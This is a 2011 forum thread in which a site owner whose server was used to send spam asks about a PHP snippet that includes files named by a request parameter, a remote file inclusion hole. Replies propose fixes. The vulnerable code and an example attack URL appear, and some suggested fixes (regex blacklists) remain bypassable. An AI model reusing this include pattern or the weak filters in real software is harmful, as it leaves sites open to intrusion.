Remix919
11-22-2011, 02:31 AM
Ok, so for the past 2 weeks I kept having some idiot from malaysia somehow posting a file into my website directory and sending mass spam using my server. This issue is isolated to just 1 account on the server and each time I tracked the file down using the mail headers and deleted the file, but he just kept doing it, now I think I FINALLY figured out how he's doing it and would like some advice as to whether or not this is how he's doing it and if so, how can I stop it?
So, that being said, I have a simple piece of PHP code that basically allows me to change the page that shows up in the main content area of the website, well, I think this is also how he's been somehow injecting files into my website account because I just realized that I can use ?view=http://domain.com/hack as the file included. Do you guys think this is how he's been getting in and how can I stop this from happening?
<?
$view = $_REQUEST['view'];
if($view == "") {
$view = "main";
}
include "$view.php";
?>
myfayt
11-22-2011, 03:02 AM
Just to comment, it could be a bot putting the file and sending emails from your website. They act like humans and run 24/7.
<?
$view = $_REQUEST['view'];
if($view == "") {
$view = "main";
}
include "$view.php";
?>
this is really insecure..
if you have to use this do something like..
$view = $_REQUEST['view'];
if($view == "")
{
$view = "main";
}
if(!preg_match('/(http)?\:?\/?\/?([w]+)?\./', $view))
{
include "$view.php";
}
else
{
echo "invalid.";
}
basically that won't allow anything with http, www, or anything.whatever
Remix919
11-22-2011, 03:06 AM
Just to comment, it could be a bot putting the file and sending emails from your website. They act like humans and run 24/7.
A bot? what do you mean? at one point I did find a PHP shell script that when accessed via a web browser allowed them to view my FTP structure and upload files without having to login first, but I figured they used the injection to get that file in there in the first place. I highly doubt they have my password because it's a highly secure randomly generated and I changed it after each incident.
Remix919
11-22-2011, 03:07 AM
<?
$view = $_REQUEST['view'];
if($view == "") {
$view = "main";
}
include "$view.php";
?>
this is really insecure..
if you have to use this do something like..
$view = $_REQUEST['view'];
if($view == "")
{
$view = "main";
}
if(!preg_match('/(http)/', $view))
{
include "$view.php";
}
Thanks Adee! Just what I was looking for :D
Thanks Adee! Just what I was looking for :D
i edited my post.. that won't stop someone from doing site.com/file.php lol
tangoforce
11-22-2011, 03:21 AM
Easier still, use the full server path to your files (screws up http requests and lowers the cpu load by avoiding regular expressions):
<?
$view = $_REQUEST['view'];
if($view == "") {
$view = "main";
}
include "path/to/yoursite.com/public_html/$view.php";
?>
Any more http://url.to/hacker.php will be screwed.
myfayt
11-22-2011, 03:41 AM
A bot? what do you mean? at one point I did find a PHP shell script that when accessed via a web browser allowed them to view my FTP structure and upload files without having to login first, but I figured they used the injection to get that file in there in the first place. I highly doubt they have my password because it's a highly secure randomly generated and I changed it after each incident.
A bot is a script or program that crawls the web and posts spam and things. Also called Spiders which research things.
http://en.wikipedia.org/wiki/Web_crawler
But also some are made strictly for spamming websites and mass emails.
Remix919
11-22-2011, 05:01 AM
Thanks for all the help guys! And I updated to your most recent code Adee, I appreciate your help too tango, but I do include some files below the root, so not sure if that code will work?
XterM
11-22-2011, 08:11 AM
try to validate $view and existed file. i validated it in some steps.
define valid pages in an array. defined valid pages, make validation is easy.
define $default page too. default page is used if $view is not valid. don't forget to upload default page.
$default = "main";
$valid = array("gallery","new");
$view = $_GET[view];
$view = (!in_array($view, $valid))?$default:$view; //simple validate
don't finished here. next step, check if file is existed. we don't want any error displayed. cause, hacker very like for looking some errors.
$view = ((file_exists($view.".php"))?$view:$default;
then, include it
include($view.".php");
no error will displayed, even when you forgot to upload your "view" files.
i follow this tutorial:
http://explorecrew.org/portal.php?page=read&ID=196#[PHP] Pages Inclusion Hardening
in that tutorial, inclusion injection prevention disclousured completed.
I am sorry my english is very bad.
hope it help.
